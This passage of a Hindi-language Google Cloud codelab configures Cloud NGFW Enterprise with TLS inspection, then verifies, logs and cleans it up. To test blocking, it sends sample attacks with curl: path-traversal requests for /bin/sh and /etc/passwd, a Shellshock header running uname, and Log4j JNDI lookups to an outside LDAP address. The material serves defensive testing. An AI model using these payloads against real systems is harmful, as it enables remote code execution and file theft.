पहले, हमने इंटरनल सबनेट से हमारे सर्वर पर इन्ग्रेस डेटा ट्रैफ़िक को अनुमति देने के लिए फ़ायरवॉल के नियम को कॉन्फ़िगर किया था. अब हम मौजूदा इन्ग्रेस डेटा ट्रैफ़िक के नियमों को अपडेट करेंगे और कार्रवाई को लागू करने के लिए _security_profile_group पर सेट करेंगे. इससे ई/डब्ल्यू के एल7 लेवल की जांच, TLS के साथ चालू हो जाएगी:
gcloud compute network-firewall-policies rules update 800 \
--action=apply_security_profile_group \
--firewall-policy=$prefix-fwpolicy \
--global-firewall-policy \
--security-profile-group=//networksecurity.googleapis.com/organizations/$org_id/locations/global/securityProfileGroups/$prefix-spg \
--tls-inspect
TLS की मदद से, नॉर्थबाउंड L7 जांच करने के लिए नया नियम बनाएं.
gcloud compute network-firewall-policies rules create 900 \
--description "Inspect egress traffic over TCP 443" \
--action=apply_security_profile_group \
--firewall-policy=$prefix-fwpolicy \
--global-firewall-policy \
--direction=EGRESS \
--enable-logging \
--layer4-configs tcp:443 \
--dest-ip-ranges=0.0.0.0/0 \
--target-secure-tags $project_id/$prefix-vpc-tags/$prefix-vpc-client \
--security-profile-group=/networksecurity.googleapis.com/organizations/$org_id/locations/global/securityProfileGroups/$prefix-spg \
--tls-inspect
दोबारा जांच न हो, इसके लिए ई/डब्ल्यू के लिए EGRESS की अनुमति देने के लिए नया नियम बनाएं.
gcloud compute network-firewall-policies rules create 850 \
--description "Prevent double inspection" \
--action=ALLOW \
--firewall-policy=$prefix-fwpolicy \
--global-firewall-policy \
--direction=EGRESS \
--layer4-configs tcp:443 \
--dest-ip-ranges=10.0.0.0/24 \
--target-secure-tags $project_id/$prefix-vpc-tags/$prefix-vpc-client
10. नॉर्थबाउंड TLS इंस्पेक्शन की पुष्टि करना
क्लाइंट वीएम टैब पर वापस जाएं या फिर से कनेक्ट करें:
gcloud compute ssh $prefix-$zone-client --tunnel-through-iap --zone $zone
हमलों के सैंपल को किसी इंटरनेट डेस्टिनेशन पर भेजें:
curl https://www.eicar.org/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; uname -a' --max-time 2
curl https://www.eicar.org/cgi-bin/user.sh -H 'FakeHeader:() { :; }; echo Content-Type: text/html; echo ; /bin/uname -a' --max-time 2
curl https://www.eicar.org/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd --max-time 2
curl -H 'User-Agent: ${jndi:ldap://123.123.123.123:8055/a}' https://www.eicar.org --max-time 2
curl -H 'User-Agent: ${jndi:ldap://123.123.123.123:8081/a}' https://www.eicar.org --max-time 2
यहां दिए गए अनुमानित आउटपुट के मुताबिक कोई जवाब नहीं मिला. इससे यह पुष्टि होती है कि सैंपल अटैक अब ब्लॉक किए जा रहे हैं:
curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104 curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104 curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104 curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104 curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104
वैरिएबल को पहले से मौजूद सर्वर आईपी पर सेट करें:
export target_privateip=[INTERNAL_IP_OF_WWW_SERVER]
सर्वर को TLS अनुरोधों के सैंपल भेजें:
curl https://$target_privateip --max-time 2
अनुमानित आउटपुट:
curl: (60) SSL certificate problem: self signed certificate More details here: https://curl.se/docs/sslcerts.html curl failed to verify the legitimacy of the server and therefore could not establish a secure connection to it. To learn more about this situation and how to fix it, please visit the web page mentioned above.
यह अनुरोध पूरा क्यों नहीं हो सका? ऐसा इसलिए होता है, क्योंकि फ़ायरवॉल को सर्वर से एक ऐसा सर्टिफ़िकेट मिलता है जिस पर भरोसा नहीं किया जा सकता. ऐसा होने पर, यह क्लाइंट को एक सेल्फ़-साइन किया गया सर्टिफ़िकेट भेजेगा. भरोसे को चालू करने के लिए, हमें ट्रस्ट कॉन्फ़िगरेशन के हिस्से के तौर पर सीए सर्टिफ़िकेट जोड़ना होगा.
Cloud Shell पर वापस जाएं.
11. ट्रस्ट कॉन्फ़िगरेशन कॉन्फ़िगर करना
रूट सीए सर्टिफ़िकेट पाएं और उसे सही फ़ॉर्मैट में वैरिएबल के तौर पर सेट करें.
export NGFW_ROOT_CA=$(gcloud privateca roots describe $prefix-CA-Root --project=$project_id --pool=$prefix-CA-Pool --location=$region --format="value(pemCaCertificates)" | sed 's/^/ /')
Trust Config YAML फ़ाइल को कॉन्फ़िगर करें. इस फ़ाइल में CA सर्टिफ़िकेट जैसी ट्रस्ट की जानकारी शामिल है:
cat > trust_config.yaml << EOF
name: "$prefix-trust-config"
trustStores:
- trustAnchors:
- pemCertificate: |
${NGFW_ROOT_CA}
EOF
ऊपर दिए गए निर्देशों में, ट्रस्ट स्टोर के हिस्से के तौर पर आपका रूट सीए सर्टिफ़िकेट शामिल था. इसकी वजह यह है कि आपके सर्वर सर्टिफ़िकेट पर, रूट सीए का इस्तेमाल करके हस्ताक्षर किया गया था. इसका मतलब है कि अगर आपकी TLS नीति में discountPublicCaSet को गलत पर सेट किया गया है, तो सार्वजनिक CA के अलावा फ़ायरवॉल, उन्हें मिलने वाले ऐसे किसी भी सर्टिफ़िकेट पर भरोसा करेगा जिस पर आपके रूट CA से हस्ताक्षर किया गया हो.
ट्रस्ट कॉन्फ़िगरेशन के कॉन्टेंट की जांच करें.
cat trust_config.yaml
आउटपुट का सैंपल:
सर्टिफ़िकेट के इंडेंटेशन अलाइनमेंट पर खास ध्यान दें. यह सही फ़ॉर्मैट में होना चाहिए.
name: "ngfw-enterprise-trust-config"
trustStores:
- trustAnchors:
- pemCertificate: |
-----BEGIN CERTIFICATE-----
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRS
-----END CERTIFICATE-----
ट्रस्ट कॉन्फ़िगरेशन इंपोर्ट करें:
gcloud certificate-manager trust-configs import $prefix-trust-config --project=$project_id --location=$region --source=trust_config.yaml
ट्रस्ट कॉन्फ़िगरेशन शामिल करने के लिए, TLS नीति की YAML फ़ाइल अपडेट करें:
cat > tls_policy.yaml << EOF description: Test tls inspection policy. name: projects/$project_id/locations/$region/tlsInspectionPolicies/$prefix-tls-policy caPool: projects/$project_id/locations/$region/caPools/$prefix-CA-Pool excludePublicCaSet: false minTlsVersion: TLS_1_1 tlsFeatureProfile: PROFILE_COMPATIBLE trustConfig: projects/$project_id/locations/$region/trustConfigs/$prefix-trust-config EOF
अपडेट की गई TLS नीति इंपोर्ट करें:
gcloud network-security tls-inspection-policies import $prefix-tls-policy --project=$project_id --location=$region --source=tls_policy.yaml
12. ई/डब्ल्यू TLS जांच की पुष्टि करना
अपडेट किए गए ट्रस्ट कॉन्फ़िगरेशन की मदद से, ई/डब्ल्यू ट्रैफ़िक की जांच करने के लिए, क्लाइंट पर वापस SSH करें:
gcloud compute ssh $prefix-$zone-client --tunnel-through-iap --zone $zone
सर्वर पर TLS अनुरोध का सैंपल चलाएं:
curl https://$target_privateip --max-time 2
अगर आपको अब भी नीचे दिया गया आउटपुट मिलता है, तो कृपया अपडेट लागू होने तक इंतज़ार करें.
curl: (60) SSL certificate problem: self signed certificate More details here: https://curl.se/docs/sslcerts.html curl failed to verify the legitimacy of the server and therefore could not establish a secure connection to it. To learn more about this situation and how to fix it, please visit the web page mentioned above.
अनुमानित आउटपुट:
Page on ngfw-enterprise-us-west1-b-www in network ngfw-enterprise-vpc zone $zone
सर्वर पर नुकसान पहुंचाने वाला टेस्ट ट्रैफ़िक भेजें:
curl https://$target_privateip/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; uname -a' --max-time 2
curl https://$target_privateip/cgi-bin/user.sh -H 'FakeHeader:() { :; }; echo Content-Type: text/html; echo ; /bin/uname -a' --max-time 2
curl https://$target_privateip/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd --max-time 2
curl -H 'User-Agent: ${jndi:ldap://123.123.123.123:8055/a}' https://$target_privateip --max-time 2
curl -H 'User-Agent: ${jndi:ldap://123.123.123.123:8081/a}' https://$target_privateip --max-time 2
अनुमानित आउटपुट:
curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104 curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104 curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104 curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104 curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104
यहां दिए गए अनुमानित आउटपुट के मुताबिक कोई जवाब नहीं मिला. इससे यह पुष्टि होती है कि ई/डब्ल्यू के लिए, सैंपल अटैक अब ब्लॉक किए जा रहे हैं.
13. लॉग इन हो रहा है
Cloud Console के ज़रिए, Loging > Logs Explorer पर जाएं, नीचे दिया गया फ़िल्टर डालें और लॉग से क्वेरी करें. [PROJECT_ID] की जगह अपना प्रोजेक्ट आईडी डालें:
logName="projects/[PROJECT_ID]/logs/networksecurity.googleapis.com%2Ffirewall_threat"
Cloud NGFW Enterprise के लॉग की एंट्री, यहां दी गई जानकारी की तरह से दिखनी चाहिए:
लॉग एंट्री को बड़ा करें और ध्यान दें कि क्लाइंट VM से सर्वर पर भेजे गए हमलों की पहचान की गई और उन्हें ब्लॉक कर दिया गया. नीचे दिए गए स्क्रीनशॉट के मुताबिक, Apache Log4j रिमोट कोड एक्सीक्यूशन की समस्या.
आपने नुकसान पहुंचाने वाले अनुरोधों को ब्लॉक करने के लिए, टीएलएस जांच की सुविधा के साथ Cloud NGFW Enterprise को डिप्लॉय कर लिया है.
खाता मिटाने का तरीका जानने के लिए, अगले सेक्शन पर जाएं.
14. खाता मिटाने का तरीका
बुनियादी सेटअप क्लीन-अप करना
इंस्टेंस हटाएं:
gcloud -q compute instances delete $prefix-$zone-www --zone=$zone gcloud -q compute instances delete $prefix-$zone-client --zone=$zone
अगर tagAdmin और tagUsers की भूमिकाएं बदली गई हैं, तो नीचे दिया गया तरीका अपनाएं:
export user_id=$(gcloud auth list --format="value(account)") gcloud organizations remove-iam-policy-binding $org_id \ --member user:$user_id --role roles/resourcemanager.tagAdmin gcloud organizations remove-iam-policy-binding $org_id \ --member user:$user_id --role roles/resourcemanager.tagUser
टैग की और वैल्यू हटाएं:
gcloud -q resource-manager tags values delete $project_id/$prefix-vpc-tags/$prefix-vpc-client gcloud -q resource-manager tags values delete $project_id/$prefix-vpc-tags/$prefix-vpc-server gcloud -q resource-manager tags keys delete $project_id/$prefix-vpc-tags
Cloud Firewall नेटवर्क की नीति और असोसिएशन हटाएं:
gcloud -q compute network-firewall-policies associations delete \
--firewall-policy $prefix-fwpolicy \
--name $prefix-fwpolicy-association \
--global-firewall-policy
gcloud -q compute network-firewall-policies delete $prefix-fwpolicy --global
क्लाउड राऊटर और क्लाउड एनएटी (NAT) को मिटाएं:
gcloud -q compute routers nats delete $prefix-cloudnat-$region \ --router=$prefix-cr --router-region $region gcloud -q compute routers delete $prefix-cr --region=$region
रिज़र्व किए गए आईपी पते मिटाएं:
gcloud -q compute addresses delete $prefix-$region-cloudnatip --region=$region
क्लाउड फ़ायरवॉल एसपीजी, असोसिएशन, और टीएलएस क्लीन-अप
सुरक्षा प्रोफ़ाइल ग्रुप और खतरे की प्रोफ़ाइल को इस क्रम में मिटाएं:
gcloud -q network-security security-profile-groups delete \ $prefix-spg \ --organization $org_id \ --location=global gcloud -q network-security security-profiles threat-prevention \ delete $prefix-sp-threat \ --organization $org_id \ --location=global
Cloud Firewall के एंडपॉइंट असोसिएशन को मिटाएं:
gcloud -q network-security firewall-endpoint-associations delete \ $prefix-association --zone $zone
Cloud फ़ायरवॉल एंडपॉइंट मिटाएं. इसमें करीब 20 मिनट लग सकते हैं:
gcloud -q network-security firewall-endpoints delete $prefix-$zone --zone=$zone --organization $org_id
इसके अलावा, नीचे दिया गया निर्देश चलाकर, Cloud NGFW एंडपॉइंट के मिट जाने की पुष्टि की जा सकती है:
gcloud network-security firewall-endpoints list --zone $zone \ --organization $org_id
एंडपॉइंट की स्थिति में यह दिखना चाहिए:
STATE: DELETING
पूरा होने पर, एंडपॉइंट को सूची में नहीं दिखाया जाएगा.
TLS नीति और ट्रस्ट कॉन्फ़िगरेशन को इस क्रम में मिटाएं:
gcloud -q network-security tls-inspection-policies delete \ $prefix-tls-policy \ --location=$region gcloud -q alpha certificate-manager trust-configs delete \ $prefix-trust-config \ --location=$region
रूट सीए और सीए पूल को बंद करें और मिटाएं:
gcloud -q privateca roots disable $prefix-CA-Root \ --location=$region \ --pool=$prefix-CA-Pool \ --ignore-dependent-resources gcloud -q privateca roots delete $prefix-CA-Root \ --location=$region \ --pool=$prefix-CA-Pool \ --skip-grace-period \ --ignore-active-certificates \ --ignore-dependent-resources gcloud -q privateca pools delete $prefix-CA-Pool \ --location=$region \ --ignore-dependent-resources
सबनेट और VPC का क्लीन-अप
आखिर में, सबनेट और VPC नेटवर्क मिटाएं:
gcloud -q compute networks subnets delete $prefix-$region-subnet --region $region gcloud -q compute networks delete $prefix-vpc
15. बधाई हो!
बधाई हो, आपने ईस्ट-वेस्ट और नॉर्थबाउंड TLS जांच के लिए Cloud NGFW Enterprise कोडलैब को पूरा कर लिया है.